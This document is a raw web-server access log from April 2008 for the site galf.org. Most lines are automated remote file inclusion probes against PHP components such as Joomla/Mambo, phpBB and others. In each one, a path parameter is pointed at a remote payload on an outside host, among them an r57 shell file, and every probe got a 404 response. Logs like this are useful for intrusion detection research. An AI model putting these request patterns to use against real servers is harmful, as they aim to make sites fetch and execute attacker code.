202.29.32.2 - - [06/Apr/2008:17:34:09 -0700] "GET /logs/access.log//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
202.29.32.2 - - [06/Apr/2008:17:34:10 -0700] "GET //components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
202.29.32.2 - - [06/Apr/2008:17:34:11 -0700] "GET /logs//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
202.29.32.2 - - [06/Apr/2008:17:34:13 -0700] "GET /logs/access.log//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
202.29.32.2 - - [06/Apr/2008:17:34:14 -0700] "GET //components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
202.29.32.2 - - [06/Apr/2008:17:34:15 -0700] "GET /logs//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
77.64.78.58 - - [06/Apr/2008:17:34:17 -0700] "GET /logs/scripts.log HTTP/1.1" 200 262144 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.galf.org"
216.246.192.39 - - [06/Apr/2008:17:34:20 -0700] "GET /index2.php?page=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.29.32.2 - - [06/Apr/2008:17:34:26 -0700] "GET /logs/access_070820.log//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
202.29.32.2 - - [06/Apr/2008:17:34:28 -0700] "GET /logs/access_070820.log//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
205.234.253.11 - - [06/Apr/2008:17:34:44 -0700] "GET /logs/access_071217.log/index.php?x=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.37.186.93 - - [06/Apr/2008:17:34:46 -0700] "GET /head.php?path=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.37.186.93 - - [06/Apr/2008:17:34:47 -0700] "GET /logs/head.php?path=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.75.141.104 - - [06/Apr/2008:17:35:15 -0700] "GET /logs/access_071008.log/akocomments.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
205.234.253.11 - - [06/Apr/2008:17:35:26 -0700] "GET /logs/access_080310.log/index.php?meio=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.253.11 - - [06/Apr/2008:17:35:27 -0700] "GET /index.php?meio=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.253.11 - - [06/Apr/2008:17:35:28 -0700] "GET /logs/index.php?meio=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:17:35:38 -0700] "GET /logs/access.log/index.php?nic=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
74.220.215.233 - - [06/Apr/2008:17:35:38 -0700] "GET /index.php?nic=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
74.220.215.233 - - [06/Apr/2008:17:35:39 -0700] "GET /logs/index.php?nic=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
205.234.253.11 - - [06/Apr/2008:17:35:53 -0700] "GET /logs/access_071015.log/index.php?inc=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.253.11 - - [06/Apr/2008:17:35:54 -0700] "GET /index.php?inc=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.253.11 - - [06/Apr/2008:17:35:54 -0700] "GET /logs/index.php?inc=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.253.11 - - [06/Apr/2008:17:36:03 -0700] "GET /logs/access.log/index.php?meio=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.207.204.13 - - [06/Apr/2008:17:36:31 -0700] "GET /logs/access_080310.log//components/com_forum/download.php?phpbb_root_path=http://geocities.com/d_ibenk/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
85.226.60.4 - - [06/Apr/2008:17:36:55 -0700] "GET /logs/access_080303.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.246.192.39 - - [06/Apr/2008:17:37:09 -0700] "GET /logs/access_071231.log/main.php?page=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.192.39 - - [06/Apr/2008:17:37:40 -0700] "GET /logs/access_071015.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.192.39 - - [06/Apr/2008:17:37:41 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.192.39 - - [06/Apr/2008:17:37:41 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.192.39 - - [06/Apr/2008:17:38:33 -0700] "GET /logs/access_070917.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:17:39:28 -0700] "GET /logs/access.log/index.php?x=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:17:39:28 -0700] "GET /index.php?x=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:17:39:29 -0700] "GET /logs/index.php?x=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
212.174.24.65 - - [06/Apr/2008:17:39:37 -0700] "GET /logs/access.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.prepaidcard.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.174.24.65 - - [06/Apr/2008:17:39:37 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.prepaidcard.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.174.24.65 - - [06/Apr/2008:17:39:37 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.prepaidcard.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:17:39:44 -0700] "GET /logs/access_070730.log/index.php?inc=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
75.125.145.66 - - [06/Apr/2008:17:39:52 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://m4r0c.com/rfi-scan/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
75.125.145.66 - - [06/Apr/2008:17:39:52 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://m4r0c.com/rfi-scan/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
64.34.169.20 - - [06/Apr/2008:17:40:00 -0700] "GET /logs/access_080107.log/index2.php?page=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.34.169.20 - - [06/Apr/2008:17:40:00 -0700] "GET /index2.php?page=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.34.169.20 - - [06/Apr/2008:17:40:00 -0700] "GET /logs/index2.php?page=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
204.11.238.233 - - [06/Apr/2008:17:40:34 -0700] "GET /logs/access_070903.log//index.php/?mosConfig_absolute_path=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.192.39 - - [06/Apr/2008:17:41:02 -0700] "GET /logs/access_080107.log/index2.php?page=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.192.39 - - [06/Apr/2008:17:41:03 -0700] "GET /index2.php?page=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.192.39 - - [06/Apr/2008:17:41:03 -0700] "GET /logs/index2.php?page=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:17:41:20 -0700] "GET /logs/access_080310.log/index.php?meio=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:17:41:20 -0700] "GET /index.php?meio=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:17:41:21 -0700] "GET /logs/index.php?meio=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.226.60.4 - - [06/Apr/2008:17:41:34 -0700] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:17:41:42 -0700] "GET /logs/access.log/index.php?meio=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:17:41:59 -0700] "GET /logs/access.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:17:41:59 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:17:41:59 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.73.103.57 - - [06/Apr/2008:17:42:33 -0700] "GET /logs/access_080114.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://bergen.pap.no/includes/echo3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
75.125.145.66 - - [06/Apr/2008:17:42:34 -0700] "GET /http://m4r0c.com/rfi-scan/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
216.73.103.57 - - [06/Apr/2008:17:42:34 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://bergen.pap.no/includes/echo3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.73.103.57 - - [06/Apr/2008:17:42:34 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://bergen.pap.no/includes/echo3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
75.125.145.66 - - [06/Apr/2008:17:42:34 -0700] "GET /logs/http://m4r0c.com/rfi-scan/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
72.29.67.38 - - [06/Apr/2008:17:42:39 -0700] "GET /logs/access_080107.log/index2.php?page=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.67.38 - - [06/Apr/2008:17:42:39 -0700] "GET /index2.php?page=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.67.38 - - [06/Apr/2008:17:42:39 -0700] "GET /logs/index2.php?page=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:17:43:01 -0700] "GET /logs/access_080113.log/index.php?nic=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:17:43:01 -0700] "GET /index.php?nic=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:17:43:01 -0700] "GET /logs/index.php?nic=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:17:43:03 -0700] "GET /logs/access_071217.log/index.php?x=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.67.38 - - [06/Apr/2008:17:43:07 -0700] "GET /logs/access_080107.log/index2.php?page=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.67.38 - - [06/Apr/2008:17:43:07 -0700] "GET /index2.php?page=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.67.38 - - [06/Apr/2008:17:43:08 -0700] "GET /logs/index2.php?page=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
80.67.24.32 - - [06/Apr/2008:17:43:20 -0700] "GET /index.php?page=http://www.cpjtechniek.nl/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:17:43:47 -0700] "GET /logs/access_080113.log/index.php?content=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:17:43:47 -0700] "GET /index.php?content=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:17:43:48 -0700] "GET /logs/index.php?content=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
75.125.145.66 - - [06/Apr/2008:17:43:50 -0700] "GET /logs/start.php?page=http://m4r0c.com/rfi-scan/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
75.125.145.66 - - [06/Apr/2008:17:43:50 -0700] "GET /start.php?page=http://m4r0c.com/rfi-scan/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
64.34.169.20 - - [06/Apr/2008:17:44:21 -0700] "GET /logs/access_071210.log/index2.php?page=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
72.29.67.38 - - [06/Apr/2008:17:47:29 -0700] "GET /logs/access_071210.log/index2.php?page=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.67.38 - - [06/Apr/2008:17:47:36 -0700] "GET /logs/access_071210.log/index2.php?page=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.30.216.92 - - [06/Apr/2008:17:48:17 -0700] "GET /logs/access_080113.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
216.246.192.39 - - [06/Apr/2008:17:49:17 -0700] "GET /logs/access_071210.log/index2.php?page=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.253.11 - - [06/Apr/2008:17:49:35 -0700] "GET /logs/access_071210.log/default.php?page=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.253.11 - - [06/Apr/2008:17:49:35 -0700] "GET /logs/access_071210.log/default.php?page=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.253.11 - - [06/Apr/2008:17:49:35 -0700] "GET /default.php?page=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.253.11 - - [06/Apr/2008:17:49:35 -0700] "GET /default.php?page=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.253.11 - - [06/Apr/2008:17:49:36 -0700] "GET /logs/default.php?page=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.253.11 - - [06/Apr/2008:17:49:36 -0700] "GET /logs/default.php?page=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.253.11 - - [06/Apr/2008:17:50:28 -0700] "GET /logs/access_071217.log/default.php?page=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.253.11 - - [06/Apr/2008:17:50:48 -0700] "GET /logs/access_071210.log/index.php?doc=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.192.39 - - [06/Apr/2008:17:50:57 -0700] "GET /logs/access.log//main.php?sayfa=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
216.246.192.39 - - [06/Apr/2008:17:50:57 -0700] "GET //main.php?sayfa=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
216.246.192.39 - - [06/Apr/2008:17:50:57 -0700] "GET /logs//main.php?sayfa=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
87.117.219.26 - - [06/Apr/2008:17:51:11 -0700] "GET /logs/access_071015.log/index.php?include=http://broomfield72.org/photos/picnic/thumbs/logo.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.117.219.26 - - [06/Apr/2008:17:51:12 -0700] "GET /index.php?include=http://broomfield72.org/photos/picnic/thumbs/logo.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.117.219.26 - - [06/Apr/2008:17:51:12 -0700] "GET /logs/index.php?include=http://broomfield72.org/photos/picnic/thumbs/logo.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:17:51:30 -0700] "GET /logs/access_071119.log/template.php?pagina=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:17:51:30 -0700] "GET /template.php?pagina=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:17:51:30 -0700] "GET /logs/template.php?pagina=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.195.52.32 - - [06/Apr/2008:17:51:32 -0700] "GET / HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:17:51:54 -0700] "GET /logs/access_071231.log/template.php?pagina=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
212.174.24.65 - - [06/Apr/2008:17:53:34 -0700] "GET /logs/access_080113.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.prepaidcard.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.117.219.26 - - [06/Apr/2008:17:53:37 -0700] "GET /logs/access_070730.log/index.php?include=http://broomfield72.org/photos/picnic/thumbs/logo.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
200.96.247.163 - - [06/Apr/2008:17:53:59 -0700] "GET /logs/access.log/index.php?redir=http://meucu.iespana.es/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.96.247.163 - - [06/Apr/2008:17:53:59 -0700] "GET /index.php?redir=http://meucu.iespana.es/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.96.247.163 - - [06/Apr/2008:17:54:00 -0700] "GET /logs/index.php?redir=http://meucu.iespana.es/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.195.52.121 - - [06/Apr/2008:17:54:09 -0700] "GET /labia/ HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
67.195.51.105 - - [06/Apr/2008:17:54:34 -0700] "GET /cendoc/ HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
67.195.52.59 - - [06/Apr/2008:17:54:43 -0700] "GET /?M=A HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
140.120.27.17 - - [06/Apr/2008:17:55:28 -0700] "GET /logs/access_080317.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://our-tools.by.ru/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
140.120.27.17 - - [06/Apr/2008:17:55:28 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://our-tools.by.ru/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
140.120.27.17 - - [06/Apr/2008:17:55:29 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://our-tools.by.ru/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
58.120.225.104 - - [06/Apr/2008:17:59:24 -0700] "GET /logs/access.log/includes/archive/archive_topic.php?phpbb_root_path=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
58.120.225.104 - - [06/Apr/2008:17:59:24 -0700] "GET /includes/archive/archive_topic.php?phpbb_root_path=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
58.120.225.104 - - [06/Apr/2008:17:59:25 -0700] "GET /logs/includes/archive/archive_topic.php?phpbb_root_path=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
58.120.225.104 - - [06/Apr/2008:17:59:27 -0700] "GET /logs/access.log/includes/archive/archive_topic.php?phpbb_root_path=http://www.frilufts.se/malmo/tvm//pollphp/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
58.120.225.104 - - [06/Apr/2008:17:59:27 -0700] "GET /includes/archive/archive_topic.php?phpbb_root_path=http://www.frilufts.se/malmo/tvm//pollphp/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
58.120.225.104 - - [06/Apr/2008:17:59:28 -0700] "GET /logs/includes/archive/archive_topic.php?phpbb_root_path=http://www.frilufts.se/malmo/tvm//pollphp/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
67.195.52.36 - - [06/Apr/2008:17:59:45 -0700] "GET /logs/ HTTP/1.0" 200 7071 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
64.191.104.52 - - [06/Apr/2008:18:02:35 -0700] "GET /index.php?option=com_jcs&task=add&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.207.204.13 - - [06/Apr/2008:18:02:45 -0700] "GET /logs/access_080113.log//modules/xfsection/modify.php?dir_module=http://geocities.com/d_ibenk/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.207.204.13 - - [06/Apr/2008:18:02:45 -0700] "GET //modules/xfsection/modify.php?dir_module=http://geocities.com/d_ibenk/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.207.204.13 - - [06/Apr/2008:18:02:45 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://geocities.com/d_ibenk/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.215.80.102 - - [06/Apr/2008:18:03:10 -0700] "GET /logs/access_080303.log/!scanftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.215.80.102 - - [06/Apr/2008:18:03:11 -0700] "GET /!scanftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.215.80.102 - - [06/Apr/2008:18:03:11 -0700] "GET /logs/!scanftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.195.52.111 - - [06/Apr/2008:18:04:03 -0700] "GET /logs/?M=A HTTP/1.0" 200 7071 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.52.169.116 - - [06/Apr/2008:18:05:24 -0700] "GET /logs/plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://geocities.com/via.lita/img.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
